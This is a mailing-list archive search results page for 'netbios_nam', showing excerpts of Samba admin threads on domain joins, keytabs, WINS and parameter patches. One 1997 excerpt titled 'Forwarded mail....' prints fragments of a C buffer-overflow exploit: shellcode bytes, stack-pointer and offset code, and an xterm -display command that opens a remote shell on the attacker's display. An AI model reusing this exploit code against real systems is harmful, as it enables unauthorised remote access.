search for: netbios_nam

Displaying 20 results from an estimated 48 matches for "netbios_nam".

Did you mean: netbios_name
2020 Aug 06
2
pam+winbind and maintaining domain membership: keytab vs tickets
...lication. All that is really needed is a way to ensure the samba server stays in the domain indefinitely and rejoins on reboot. Currently we join the domain when we provision a server with the `net ads join -U domainadmin`. After the domain join running `net ads keytab list` will list keytabs with NETBIOS_NAME at OUR.DOMAIN as the principal. It seems to work without running kinit or creating a ticket-granting-ticket. So I think that having `winbind refresh tickets` in smb.conf is unnecessary, and I can safely change `kerberos methos` to just `keytab` Questions: Is the keytab created when the `net ads...
2000 Jan 30
0
More checks for param/loadparm.c
...David Collier-Brown, | Always do right. This will gratify 185 Ellerslie Ave., | some people and astonish the rest. Willowdale, Ontario, | -- Mark Twain CANADA. 416-223-8968 | davecb@canada.sun.com -------------- next part -------------- 474a475,478 > static BOOL handle_netbios_name(char *pszParmValue,char **ptr); > static BOOL handle_netbios_aliases(char *pszParmValue,char **ptr); > static BOOL handle_password_server(char *pszParmValue, char **parm_ptr); > static BOOL validate_netbios_name(char *pszParmValue); 542,543c546,547 < {"netbios name", P_...
2002 Nov 26
3
passwd
...stalls samba 2,2,6,1 in red hat 7,2 as pdc and can authenticate well, but from a single maquina w2k I can logear with the user root, the same happens to win ws4 that I am making bad? the users I register asi to them useradd -d /dev/null -g machines -c 'Machine Account' -s /bin/false -M <NETBIOS_NAME>$ smbpasswd -am <NETBIOS_NAME in logs it says that password to me incorrect ideas please thanks
2009 Oct 16
0
Don't see a subdomain as subdomain
...; is no forest-Trust and I also do'nt see the subdomain "Under-C". With debug-level 10 I see the following information from my "Domain-A"-DC ("log.wb-Domain-A"): (...) array: struct netr_DomainTrust netbios_name : * netbios_name : 'Domain-C' dns_name : * dns_name : 'Domain-C.net' trust_flags...
2000 Jan 28
1
PATCH: 'source environment' param and % token subs for 'netbios name'
...handling of the 'netbios name' parameter so that standard_sub_basic() is run on its value when the 'netbios name' parameter is processed. This has to be done this way because the netbios name is accessed via the global_myname variable throughout Samba and not via lp_netbios_name(). - Adds a new parameter called 'source environment' which takes a path or a pipe command whose last character is '|' and does just what you would expect: calls putenv() on each line read from the given file/pipe. Rationale: - Where I work we like to have a centrally...
2020 Aug 06
0
pam+winbind and maintaining domain membership: keytab vs tickets
...ly and rejoins on reboot. Once joined it should stay in the domain and it reconnects on reboot, not rejoin. > > Currently we join the domain when we provision a server with the `net ads > join -U domainadmin`. After the domain join running `net ads keytab list` > will list keytabs with NETBIOS_NAME at OUR.DOMAIN as the principal. It seems > to work without running kinit or creating a ticket-granting-ticket. > > So I think that having `winbind refresh tickets` in smb.conf is > unnecessary, and I can safely change `kerberos methos` to just `keytab` Only if you want your kerberos ti...
2020 Aug 06
1
pam+winbind and maintaining domain membership: keytab vs tickets
...; Once joined it should stay in the domain and it reconnects on reboot, > not rejoin. > > > > Currently we join the domain when we provision a server with the `net ads > > join -U domainadmin`. After the domain join running `net ads keytab list` > > will list keytabs with NETBIOS_NAME at OUR.DOMAIN as the principal. It > seems > > to work without running kinit or creating a ticket-granting-ticket. > > > > So I think that having `winbind refresh tickets` in smb.conf is > > unnecessary, and I can safely change `kerberos methos` to just `keytab` > Onl...
2002 Oct 29
2
Wins over subnets
...aster browser and WINS server and all the desktops are pointing to this WINS server. I've tried Netbios over TCP/IP e also LMHOSTS. I've read lots of documentation and anyone could help me or give me some advise. All the nets and desktops could be reached, i can access the desktops typing \\netbios_name Thanks for now Sandro Joel Ferreira -------------- next part -------------- HTML attachment scrubbed and removed
2020 Oct 01
3
CTDB Question w/ Winbind
Martin, Here you go, # echo "mypassword" | net --no-dns-updates -U service-account-name ads testjoin domain.local kerberos_kinit_password NETBIOS_NAME$@DOMAIN.LOCAL failed: Client not found in Kerberos database Join to domain is not valid: The name provided is not a properly formed account name. On Wed, Sep 30, 2020 at 9:34 PM Martin Schwenke <martin at meltin.net> wrote: > Hi Bob, > > On Wed, 30 Sep 2020 08:59:41 -0400, Robert...
2005 Jul 20
2
Dual-homed weirdness
...l-homed. For those users, they can authenticate properly to the PDC, but when it comes time to mount their profile, they get an error about Windows not being able to find their profile, so they have to use a local one. They also can't directly mount any shares on the server with the \\NETBIOS_NAME\ calls. If these users pull their plug on the .2 network, it works fine. So does anyone have any suggestions for things we can do, either on the client, samba, or DHCP end, to work around this problem? Thanks, Wade -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (Darwin) iD8DBQFC3llSo4...
2023 Sep 09
1
Failed to join domain: failed to find DC for domain...
...thon3/dist-packages/samba/netcmd/__init__.py", line 185, > in _run return self.run(*args, **kwargs) > ^^^^^^^^^^^^^^^^^^^^^^^^^ > File "/usr/lib/python3/dist-packages/samba/netcmd/domain.py", line > 695, in run > (sid, domain_name) = s3_net.join_member(netbios_name, > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > From member > /etc/krb5.conf > [libdefaults] > default_realm = HOME.ROB-CAMPBELL.LAN > dns_lookup_realm = false > dns_lookup_kdc = true > > /etc/samba/smb.conf > # Global parameters > [global] &g...
2023 Sep 08
1
Failed to join domain: failed to find DC for domain...
...ile "/usr/lib/python3/dist-packages/samba/netcmd/__init__.py", line 185, in _run return self.run(*args, **kwargs) ^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3/dist-packages/samba/netcmd/domain.py", line 695, in run (sid, domain_name) = s3_net.join_member(netbios_name, ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ >From member /etc/krb5.conf [libdefaults] default_realm = HOME.ROB-CAMPBELL.LAN dns_lookup_realm = false dns_lookup_kdc = true /etc/samba/smb.conf # Global parameters [global] bind interfaces only = Yes dedicated keytab file = /etc/kr...
2002 Jul 03
2
mount windows xp share
Hello, I've searched endlessly a solution to my problem without any luck. I'm trying to mount a Windows XP share to a Debian box like this. mount -t //smbuser@192.168.0.2/test /mnt/test and it just gives me: mount: wrong fs type, bad option, bad superblock on //192.168.0.2/test, or too many mounted file systems it however works fine to smbclient //192.168.0.2/test -U smbuser any
2003 Jun 27
2
W2K PDC Domain
...xisting set of credentials on SAMBA 2.2.7 and "The account used is a computer account. Use your global user account or local user account to access this server." on SAMBA 3.0.0. On W98 I am able to logon to the domain, but unable to execute the map logon drive = h: or logon home = \\netbios_name\home\%u TIA, cmc
2004 Feb 18
1
smbclient -L shows only a part of the shares
Hi, I am using Samba 3.0.1 under Debian Unstable (Kernel 2.4.22). (But also tried this with 2.2.8 with the same results) I use the command "smbclient -L netbios_name -Uname%pw" to list the shares of one of the servers of an ADS Domain. Unfortunately only about 30% of the shares of this particular server appear in the list. In windows all shares are visible. I used the same account in Linux and Windows, to browse the shares. Any Hints? Regards, Rainer...
2023 Apr 14
1
Is LDAP + Kerberos without Active Directory no longer supported?
...file = FILE:/etc/samba/samba.keytab kerberos method = dedicated keytab and # We force 'member server' role to allow winbind automatically # discover what is supported by the domain controller side server role = member server realm = IPA.REALM netbios name = ${machine_name} workgroup = ${netbios_name} Apparently FreeIPA also has something like SID. Does your REALM have something like that? In the mean time I tried to find some examples I found this (where you also posted) https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1001053 This says two things other have this working with Samba &g...
2003 Mar 17
3
NSS module
Does the wins libnss module not "work" yet, or am I misconfiguring it ? Everything else in the whole samba/winbind realm works, I can log in as a domain user using pam_winbind, smbclient can resolve netbios names from WINS, etc etc. but 'ping NETBIOS_NAME' doesn't resolve. Here's some background data: Samba 2.2.8-0.1 on debian from master.samba.org apt repos. wbinfo -N <hostname> works fine smbclient -L <hostname> works fine /etc/nsswitch outtake: hosts: files dns wins /lib/libnss_wins.so exists Thanks in advance for any...
1997 Sep 26
3
Forwarded mail....
...xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd" "\x80\xe8\xcc\xff\xff\xff"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; char netbios_name[100]; char bufferz[255]; char ipz[40]; char myipz[40]; unsigned char bla[50] = "\xfe\xe8\xb1\xff\xff\xff"; int *ret; unsigned char cmd[50]="/usr/bin/X11/xterm\xff-display\xff"; unsigned char arg1[50]; char arg2[50]="bhahah\xff"; int i,pid; bzer...
2006 Jan 28
3
samba3 to samba3 domain membership failing
Hi, I'm attempting to make a Samba 3.0.10 fileserver become a domain member of a Samba 3.0.7 server which is running as a PDC. I'm using the instructions gained from here... http://samba.org/samba/docs/man/Samba-HOWTO-Collection/domain-member.html#id2538809 ...but when running the command... net rpc join -S PDCNAME -UAdministrator%password I get the error... Create of workstation
2023 Sep 09
1
Failed to join domain: failed to find DC for domain...
...ile "/usr/lib/python3/dist-packages/samba/netcmd/__init__.py", line 185, in _run return self.run(*args, **kwargs) ^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3/dist-packages/samba/netcmd/domain.py", line 695, in run (sid, domain_name) = s3_net.join_member(netbios_name, ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ./check_smb.sh 144310 ? Ss 0:00 smbd 144311 ? S 0:00 smbd 144312 ? S 0:00 smbd 144320 ? Ss 0:00 nmbd 144321 pts/1 S+ 0:00 /bin/bash ./check_smb.sh 144323 pts/1 S+ 0:00 grep...